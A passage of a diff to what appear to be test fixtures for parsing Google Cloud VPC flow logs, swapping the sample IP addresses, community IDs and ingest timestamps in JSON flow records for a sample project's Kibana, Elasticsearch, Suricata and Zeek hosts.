"{\"insertId\":\"bxuq05fhgmw91\",\"jsonPayload\":{\"bytes_sent\":\"31140\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"40\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", "end": "2019-06-14T03:49:56.461240929Z", @@ -15088,18 +15088,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60126, "bytes": 1610630, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 509 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:p5hGVmQSWVn7uQmogt/lZdp5AHE=", + "community_id": "1:sulbuX1U/FB5g/v7obH/rY0tcHw=", "bytes": 1610630, "name": "default", "transport": "tcp", @@ -15121,7 +15121,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, @@ -15158,8 +15158,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868982300Z", - "original": "{\"insertId\":\"bxuq05fhgmw95\",\"jsonPayload\":{\"bytes_sent\":\"1610630\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"509\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392011400Z", + "original": "{\"insertId\":\"bxuq05fhgmw95\",\"jsonPayload\":{\"bytes_sent\":\"1610630\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"509\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", "end": "2019-06-14T03:49:52.101129310Z", @@ -15180,10 +15180,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53104, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -15197,7 +15197,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:EvU+L/cBE9vacReP+K7ey2MZ6Bs=", + "community_id": "1:TMH6IVeF6TnVWOY7cFvGCaCMaPY=", "bytes": 37145, "name": "default", "transport": "tcp", @@ -15220,7 +15220,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { @@ -15256,8 +15256,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868985400Z", - "original": "{\"insertId\":\"bxuq05fhgmw9a\",\"jsonPayload\":{\"bytes_sent\":\"37145\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":53104,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"158\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392015600Z", + "original": "{\"insertId\":\"bxuq05fhgmw9a\",\"jsonPayload\":{\"bytes_sent\":\"37145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53104,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"158\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", "end": "2019-06-14T03:49:45.312543839Z", @@ -15284,17 +15284,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53972, "bytes": 1460, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Lyl01hrYioXpfyKN9+mxQ134Q4I=", + "community_id": "1:G2L3Fxl2iVvSfj1H8WznQobSRWA=", "bytes": 1460, "transport": "tcp", "type": "ipv4", @@ -15308,7 +15308,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -15333,8 +15333,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868988300Z", - "original": "{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392021100Z", + "original": "{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:44:20.634231041Z", "end": "2019-06-14T03:44:20.748121914Z", @@ -15361,17 +15361,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58100, "bytes": 1458, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:9uwmfdC4y+lRXBPaY4e7QA2YCdo=", + "community_id": "1:ceerAKbpeTRZtrx63xVfavQBc2o=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -15385,7 +15385,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -15407,8 +15407,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868991400Z", - "original": "{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392026700Z", + "original": "{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:49:20.512264850Z", "end": "2019-06-14T03:49:20.632737426Z", @@ -15429,9 +15429,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58100, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -15445,7 +15445,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9uwmfdC4y+lRXBPaY4e7QA2YCdo=", + "community_id": "1:ceerAKbpeTRZtrx63xVfavQBc2o=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -15460,7 +15460,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -15481,8 +15481,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868994200Z", - "original": "{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392032200Z", + "original": "{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:49:20.512407536Z", "end": "2019-06-14T03:49:20.632777660Z", @@ -15503,9 +15503,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 60756, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -15519,7 +15519,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:4doByecCNk4FneiHUzTJOKA7tlc=", + "community_id": "1:uyxwjanUYILl+d9QoxpwFo8pJ48=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -15534,7 +15534,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -15558,8 +15558,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868997100Z", - "original": "{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392036900Z", + "original": "{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:10.912193869Z", "end": "2019-06-14T03:43:11.032929292Z", @@ -15588,17 +15588,17 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 14236, "bytes": 0, - "ip": "198.51.100.182", + "ip": "67.43.156.14", "packets": 3 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:41kwAuyQ+p5wBn7ppagdhPjfslw=", + "community_id": "1:qXQaZlrUFOCwuROMy7BhHqdjz/0=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -15612,7 +15612,7 @@ }, "related": { "ip": [ - "198.51.100.182", + "67.43.156.14", "10.139.99.242" ] }, @@ -15634,8 +15634,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869000100Z", - "original": "{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"198.51.100.182\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392040400Z", + "original": "{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.247072525Z", "end": "2019-06-14T03:40:12.064908439Z", @@ -15656,9 +15656,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60122, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -15672,7 +15672,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bqmZvpZBw56sKswuSbDTHXnb0TU=", + "community_id": "1:WGg0+cb+0s5Ex6XJLyeCaLPvkpg=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -15687,7 +15687,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -15711,8 +15711,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869003Z", - "original": "{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392044800Z", + "original": "{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:41:39.087226326Z", "end": "2019-06-14T03:41:39.207635184Z", @@ -15733,9 +15733,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53972, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -15749,7 +15749,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Lyl01hrYioXpfyKN9+mxQ134Q4I=", + "community_id": "1:G2L3Fxl2iVvSfj1H8WznQobSRWA=", "bytes": 1782, "transport": "tcp", "type": "ipv4", @@ -15764,7 +15764,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -15788,8 +15788,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869006Z", - "original": 